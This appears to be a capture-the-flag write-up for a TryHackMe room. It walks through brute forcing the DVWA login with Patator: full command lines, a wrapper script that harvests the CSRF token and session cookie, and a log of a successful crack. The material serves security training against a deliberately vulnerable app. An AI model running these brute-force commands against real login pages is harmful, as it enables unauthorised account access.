I was doing the TryHackMe Brute Force Heroes room and came across the Patator brute forcing tool. Getting it to successfully brute force the DVWA application was quite a feat for me, which led me to write this post.
I am using my own Kali Linux attack box. These instructions may not apply if you use the THM Attack Box.
Contrary to what the Task instructions say, I was able to get Python 3 to work pretty well with the patator tool. Using Python 2 led to a bunch of issues and wasted time.
# create a Python 3 virtual env and activate it
$ python3 -m venv env3
$ source env3/bin/activate

# install pycurl inside the env
(env3) $ pip install pycurl

# test that pycurl imports
(env3) $ python
Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pycurl
>>>
# Make a local copy of patator (mine is named patatol in the session below) and remove its shebang, the first line, so the script is no longer pinned to the system Python 2 and runs under the interpreter from the virtual environment. Replacing the line with #!/usr/bin/env python, which resolves to the venv's Python while the env is active, has the same effect and keeps the script directly executable.
# REMOVE THIS LINE
#!/usr/bin/python2
# Run Patator
(env3) $ ./patatol http_fuzz method=POST url=http://$TARGET/login.php body="username=admin&password=password&Login=Login&user_token=f9e590fd1a2070c99d99e3e8a563c180" header="Cookie: PHPSESSID=0b7gcem4r4mqugpuh7bf21hfmd; security=impossible" -x quit:fgrep!=login.php
/home/kali/tryhackme/Rooms/bruteforceheroes/./patatol:2601: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  from telnetlib import Telnet
<class '__main__.Controller_HTTP'>
13:08:45 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.11.2 at 2023-04-23 13:08 EDT
13:08:46 patator INFO -
13:08:46 patator INFO - code size:clen time | candidate | num | mesg
13:08:46 patator INFO - -------------------------------------------------------
13:08:47 patator FAIL - xxx 70:-1 1.064 | | 1 | <class 'pycurl.error'> (49, "Couldn't parse CURLOPT_RESOLVE entry ''")
13:08:48 patator INFO - Hits/Done/Skip/Fail/Size: 0/1/0/1/1, Avg: 0 r/s, Time: 0h 0m 2s
Add the following dummy option to the command line to get past the above error. The FAIL line shows Patator 0.9 handing pycurl an empty CURLOPT_RESOLVE entry when no resolve= option is given, which libcurl rejects; any well-formed host:address mapping satisfies it. Because the URL already addresses the target by IP, the name "target" is never looked up and the mapping has no effect on where the requests go.
resolve=target:127.0.0.1
e.g. ./patator http_fuzz method=POST resolve=target:127.0.0.1 url="http://${IP}/login.php"
We learned from the Burp discussion that the response to a failed login carries the header Location: login.php, while a successful login carries Location: index.php. We use this to exclude (ignore) every response whose Location header points back at login.php, so only the hit is reported. Note that a wrong user_token also produces a 302 back to login.php, so a stale or empty token is indistinguishable from a wrong password in the output; a single token serves for the whole run because Patator does not follow the redirect, so DVWA never re-renders the form and never issues a new token.
The following switch excludes the failed login responses.
-x ignore:fgrep='Location: login.php'
THE FINAL SCRIPT (as outlined in the Brute Forcing Patator Task)
#!/bin/bash
# target address; no spaces around the = or the variable is left empty and x.x.x.x is run as a command
IP=x.x.x.x
# fetch the login page once: save the session cookie to a jar and pull the anti-CSRF token out of the form
CSRF=$(curl -s -c dvwa.cookie "http://${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
# the cookie jar is Netscape format (domain, flag, path, secure, expiry, name, value); the value is field 7
SESSIONID=$(grep PHPSESSID dvwa.cookie | awk '{print $7}')
echo "The CSRF is: $CSRF"
echo "The PHPSESSID is: $SESSIONID"
# the token is bound to this PHPSESSID, so both must come from the same request above
patator http_fuzz method=POST --threads=64 timeout=10 url="http://${IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSIONID}; security=impossible" resolve=target:127.0.0.1 -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php'
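The wrapper above launches Patator even when the token or session extraction comes back empty, and an empty user_token is not reported as an error: DVWA answers a bad token exactly like a bad password, with a 302 back to login.php, so the run ends with zero hits and looks as though the password was simply not in the list. The helpers below are an added example, not the room's or my run.sh: they parse the token and PHPSESSID the same way, refuse to build the Patator command when either value is missing, and are exercised offline against a constructed login-form fragment and cookie-jar lines that reuse the two values printed in the run further down. The function names, the 10.10.10.10 address and the passwords.txt wordlist are placeholders of mine.

```shell
#!/usr/bin/env bash
# Added example: guarded helpers for the DVWA/Patator wrapper.

# Print the user_token from DVWA's login page HTML (stdin).
# DVWA emits: <input type='hidden' name='user_token' value='<32 hex chars>' />
extract_token() {
    sed -n "s/.*name='user_token' value='\([0-9a-f]\{32\}\)'.*/\1/p" | head -n 1
}

# Print the PHPSESSID value from a curl cookie jar (stdin).
# Netscape format: domain, include-subdomains, path, secure, expiry, name, value.
# Matching on field 6 also copes with the #HttpOnly_ prefix curl adds to field 1.
extract_sessionid() {
    awk '$6 == "PHPSESSID" { print $7; exit }'
}

# Print the Patator command line for the given target, token, session id and
# wordlist, or fail loudly when token or session id is empty.
build_patator_cmd() {
    ip="$1"; token="$2"; sid="$3"; wordlist="$4"
    if [ -z "$token" ] || [ -z "$sid" ]; then
        echo "refusing to run: token='$token' sessionid='$sid'" >&2
        return 1
    fi
    printf '%s' "patator http_fuzz method=POST --threads=64 timeout=10 url=\"http://${ip}/login.php\" 0=${wordlist} body=\"username=admin&password=FILE0&Login=Login&user_token=${token}\" header=\"Cookie: PHPSESSID=${sid}; security=impossible\" resolve=target:127.0.0.1 -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php'"
}

# Constructed sample input (not a live capture): a fragment of DVWA's login
# form and cookie-jar lines in the shape curl -c writes them. The token and
# session id are the values from the run shown on this page.
SAMPLE_HTML="<form action=\"login.php\" method=\"post\">
<input type='hidden' name='user_token' value='cb8eb6397fd783c9362188fe68ee0049' />
</form>"
SAMPLE_JAR=$(printf '# Netscape HTTP Cookie File\n10.10.10.10\tFALSE\t/\tFALSE\t0\tPHPSESSID\tcudu1518ggt4s1c7es4l4uodg3\n10.10.10.10\tFALSE\t/\tFALSE\t0\tsecurity\timpossible\n')

# Parse both values from the samples and print the command that would be run.
demo() {
    token=$(printf '%s\n' "$SAMPLE_HTML" | extract_token)
    sid=$(printf '%s\n' "$SAMPLE_JAR" | extract_sessionid)
    build_patator_cmd 10.10.10.10 "$token" "$sid" passwords.txt
}

demo
```

Against a live target, replace the samples with `curl -s -c dvwa.cookie "http://${IP}/login.php"` and `cat dvwa.cookie`, then pipe the printed command to sh or eval it; keeping the build step separate lets you check the token and cookie before pointing 64 threads at the host.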
THE CRACKED PASSWORD
$ ./run.sh
The CSRF is: cb8eb6397fd783c9362188fe68ee0049
The PHPSESSID is: cudu1518ggt4s1c7es4l4uodg3
/home/kali/tryhackme/Rooms/bruteforceheroes/./patator:2601: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
  from telnetlib import Telnet
<class '__main__.Controller_HTTP'>
06:23:37 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.11.2 at 2023-04-23 06:23 EDT
06:23:37 patator INFO -
06:23:37 patator INFO - code size:clen time | candidate | num | mesg
06:23:37 patator INFO - -------------------------------------------------------
06:23:44 patator INFO - 302 281:0 0.217 | [PASSWORD] | 807 | HTTP/1.1 302 Found
06:23:45 patator INFO - Hits/Done/Skip/Fail/Size: 1/1136/0/0/1988, Avg: 148 r/s, Time: 0h 0m 7s